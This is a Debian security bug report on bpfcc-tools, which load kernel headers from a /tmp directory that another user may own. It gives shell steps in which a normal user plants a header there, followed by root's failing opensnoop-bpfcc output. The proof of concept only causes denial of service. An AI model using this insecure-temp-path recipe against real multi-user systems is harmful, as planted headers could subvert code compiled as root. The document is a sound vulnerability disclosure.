Package: bpfcc-tools
Version: 0.25.0+ds-1
Tags: security
If kernel headers are not installed in the usual place, the BPF tools
try to look them up in /tmp/kheaders-$(uname -r)/, even when this
directory is owned by another user.
This can be exploited for denial of service, or likely something worse.
To reproduce, run this as a normal user:
$ mkdir /tmp/kheaders-$(uname -r)/
$ mkdir -p /tmp/kheaders-$(uname -r)/include/linux/
$ echo "#error this header is malicious" > /tmp/kheaders-$(uname
-r)/include/linux/kconfig.h
Then run this as root:
# opensnoop-bpfcc
In file included from <built-in>:1:
././include/linux/kconfig.h:1:2: error: this header is malicious
#error this header is malicious
^
In file included from <built-in>:2:
/virtual/include/bcc/bpf.h:12:10: fatal error: 'linux/types.h' file not found
#include <linux/types.h>
^~~~~~~~~~~~~~~
2 errors generated.
Traceback (most recent call last):
File "/usr/sbin/opensnoop-bpfcc", line 261, in <module>
b = BPF(text='')
^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/bcc/__init__.py", line 476, in
__init__
raise Exception("Failed to compile BPF module %s" % (src_file or
"<text>"))
Exception: Failed to compile BPF module <text>
-- System Information:
Debian Release: bookworm/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Kernel: Linux 6.1.0-1-amd64 (SMP w/1 CPU thread; PREEMPT)
Locale: LANG=C.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages bpfcc-tools depends on:
ii python3 3.11.1-1
ii python3-bpfcc 0.25.0+ds-1
ii python3-netaddr 0.8.0-2
--
Jakub Wilk
